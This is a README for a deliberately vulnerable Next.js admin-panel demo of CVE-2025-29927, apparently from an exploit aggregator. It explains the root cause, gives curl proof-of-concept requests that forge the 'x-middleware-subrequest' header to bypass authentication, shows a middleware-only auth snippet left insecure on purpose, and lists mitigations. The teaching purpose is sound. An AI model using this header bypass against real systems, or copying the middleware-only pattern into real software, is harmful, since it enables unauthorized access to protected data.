Share
## https://sploitus.com/exploit?id=E8866072-1C2E-5A61-B961-08F3A47A4FA0
# Himalaya Tech Admin Panel โ€” CVE-2025-29927 Demo

> **WARNING: This application is intentionally vulnerable. For educational and authorized
> security research purposes only. Do NOT deploy to a public server.**

---

## About This Demo

This app demonstrates **CVE-2025-29927**, a critical authentication bypass vulnerability in
Next.js middleware (CVSS 9.1). The application simulates a realistic corporate admin panel for
the fictional company "Himalaya Tech Pvt. Ltd." โ€” making the impact of the bypass visually
compelling.

All employee records, API keys, database credentials, and other "sensitive" data shown are
**entirely fictional and mock** โ€” generated for educational demonstration only.

---

## CVE-2025-29927 โ€” Vulnerability Summary

| Field        | Detail                                                              |
|--------------|---------------------------------------------------------------------|
| CVE ID       | CVE-2025-29927                                                      |
| Severity     | Critical (CVSS 9.1)                                                 |
| Affected     | Next.js โ‰ค 14.2.29, Next.js โ‰ค 15.2.2                                |
| Fixed in     | Next.js 14.2.30, 15.2.3                                             |
| Type         | Middleware authentication bypass via HTTP header manipulation        |

### Root Cause

Next.js uses an internal HTTP header `x-middleware-subrequest` to track recursive middleware
calls and prevent infinite loops. In vulnerable versions, an attacker can **forge this header**
in an external request. When the header is present and matches the middleware's identifier,
the Next.js runtime **skips the middleware entirely**, including all authentication logic
defined within it.

### Impact

Any application that relies solely on `middleware.ts` to protect routes (a common and
recommended Next.js pattern) is vulnerable. An unauthenticated attacker can access any
protected page by simply adding one HTTP header.

---

## Proof of Concept

### Normal request (blocked โ€” redirects to /login)
```bash
curl -v http://localhost:3000/admin
# โ†’ 307 Redirect to /login
```

### Bypass request (succeeds โ€” returns full admin page)
```bash
curl -v \
  -H "x-middleware-subrequest: middleware" \
  http://localhost:3000/admin

# โ†’ 200 OK โ€” full admin dashboard HTML returned, no authentication required
```

### Accessing nested protected routes
```bash
# Admin users page
curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin/users

# System settings with "production credentials"
curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin/settings
```

### Using a browser (via Burp Suite / browser extension)
Add the request header `x-middleware-subrequest: middleware` to any request to `/admin/*`
and the middleware check will be skipped.

---

## Why This App Is Vulnerable

`middleware.ts` is the **sole** protection mechanism:

```typescript
// middleware.ts
export function middleware(request: NextRequest) {
  if (pathname.startsWith("/admin")) {
    const token = request.cookies.get("auth-token")?.value;
    if (!token || token !== "valid-session-xyz123") {
      return NextResponse.redirect(loginUrl); // โ† this entire function is skipped
    }
  }
  return NextResponse.next();
}
```

The page components themselves (e.g. `app/admin/page.tsx`) contain **no auth checks** โ€”
intentionally, to mirror real-world applications that follow the middleware-only protection
pattern.

---

## Setup & Running

### Prerequisites
- Node.js 18+
- npm or yarn

### Install
```bash
npm install
```

### Run development server
```bash
npm run dev
```

The app will be available at `http://localhost:3000`.

### Routes

| Route             | Auth Required | Description                          |
|-------------------|--------------|--------------------------------------|
| `/`               | No           | Public landing page                  |
| `/login`          | No           | Login form                           |
| `/admin`          | Yes*         | Admin dashboard with sensitive data  |
| `/admin/users`    | Yes*         | User management                      |
| `/admin/settings` | Yes*         | System settings & credentials        |

*Protected by middleware only โ€” bypassed by CVE-2025-29927.

### Demo credentials (normal login flow)
- Email: `admin@himalayatech.com`
- Password: `Admin@2024`

---

## Mitigation

1. **Upgrade Next.js** to 14.2.30+ or 15.2.3+.
2. **Defense in depth**: Add server-side auth checks inside page components/route handlers,
   not only in middleware. Middleware should be treated as a UX optimization, not a security
   boundary.
3. **Strip the header** at your reverse proxy/CDN before requests reach Next.js.

---

## Disclaimer

This application is provided for **educational purposes only**, specifically for demonstrating
the real-world impact of CVE-2025-29927 in an ethical security course context. All data
(employee records, API keys, credentials) is **entirely fictional**. Do not use this demo
application or the techniques demonstrated here against systems you do not own or have
explicit permission to test.